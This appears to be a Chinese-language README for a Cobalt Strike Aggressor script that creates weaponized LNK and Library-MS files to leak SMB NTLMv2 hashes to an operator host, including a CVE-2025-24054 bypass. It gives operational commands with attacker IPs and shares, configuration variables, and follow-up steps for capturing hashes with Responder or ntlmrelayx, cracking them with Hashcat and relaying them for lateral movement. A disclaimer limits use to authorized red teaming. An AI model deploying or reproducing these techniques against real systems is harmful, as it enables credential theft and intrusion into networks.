Cobalt Strike Aggressor 脚本,用于武器化 LNK 和 Library-MS 文件以触发 SMB NTLMv2 哈希泄露,包括 CVE-2025-24054 绕过,适用于经授权的红队行动。
一个全面的 Cobalt Strike Aggressor 脚本,用于武器化并执行恶意 LNK 文件和 Library-MS 文件,以泄露 SMB NTLMv2-SSP 哈希。包含 CVE-2025-24054 绕过技术。
此工具仅用于教育和研究目的。作者对任何滥用此代码的行为不承担任何责任。仅在你拥有或明确获准测试的系统上使用。
该脚本生成武器化的 .lnk 和 .library-ms 文件,当打开时会触发向操作者主机的 SMB 身份验证。
泄露的 NTLMv2 哈希不会在 Cobalt Strike 中显示,必须使用外部工具(如 Responder、Impacket 的 ntlmrelayx.py 或 Inveigh)在攻击者系统上运行来捕获。
收集到的哈希可以用 Hashcat 破解,或通过中继进行进一步的横向移动。
cobalt-strike-aggressor/
├── lnk_weaponizer.cna # 主 Aggressor 脚本 (v2.0)
├── standalone_lnk_weaponizer.ps1 # 独立 PowerShell 版本
├── README.md # 本文档
├── INSTALL.md # 安装和设置指南
└── examples/
├── usage_scenarios.md # 实际使用示例
└── sample_targets.csv # 示例批量操作文件
lnk_weaponizer.cna 复制到你的 Cobalt Strike Aggressor 脚本目录Cobalt Strike → Script ManagerLoad 并选择 lnk_weaponizer.cna在 Cobalt Strike 中右键单击任意 beacon 以访问:
# 使用自定义参数创建 LNK 文件
lnk_create <path> <ip> <share> <file>
# 示例
lnk_create C:\Temp 192.168.1.10 share payload.exe
# 使用自定义参数创建 Library-MS 文件
library_create <path> <ip> <share>
# 示例
library_create C:\Temp 10.10.14.22 share
# 使用默认设置
lnk_quick
library_quick
# 显示帮助
lnk_help
脚本使用以下可配置的默认值:
192.168.1.10shareC:\Temp编辑 lnk_weaponizer.cna 中的全局变量:
global('$default_ip $default_share $default_path');
$default_ip = "192.168.1.10";
$default_share = "share";
$default_path = "C:\\Temp";
.library-ms 文件这两种技术创建的文件:
脚本提供详细的日志记录:
[+] 正在创建 LNK 文件于 TARGET-COMPUTER
[+] 目标 UNC: \\192.168.1.10\share\payload.exe
[+] 本地路径: C:\Temp
[+] LNK 武器化完成
[!] 等待用户点击 LNK 文件以捕获 NTLM 哈希
未找到 Beacon
权限不足
PowerShell 执行策略
bpowershell() 处理限制通过修改脚本启用详细输出:
# 添加调试日志
blog($bid, "[DEBUG] 执行命令: " . $command);
# 在特定目标上创建 LNK 文件
lnk_create C:\Users\Public\Desktop 10.0.0.5 public malware.exe
# 创建用于 CVE-2025-24054 绕过的 Library-MS 文件
library_create C:\Users\Public\Desktop 192.168.1.100 share
# 使用默认设置进行快速部署
lnk_quick
library_quick
Library-MS 技术通过以下方式实现 CVE-2025-24054 的绕过:
本项目按原样提供,仅供教育用途。请负责任地使用,并遵守适用的法律法规。
请记住:在对任何系统进行测试之前,务必获得适当的授权。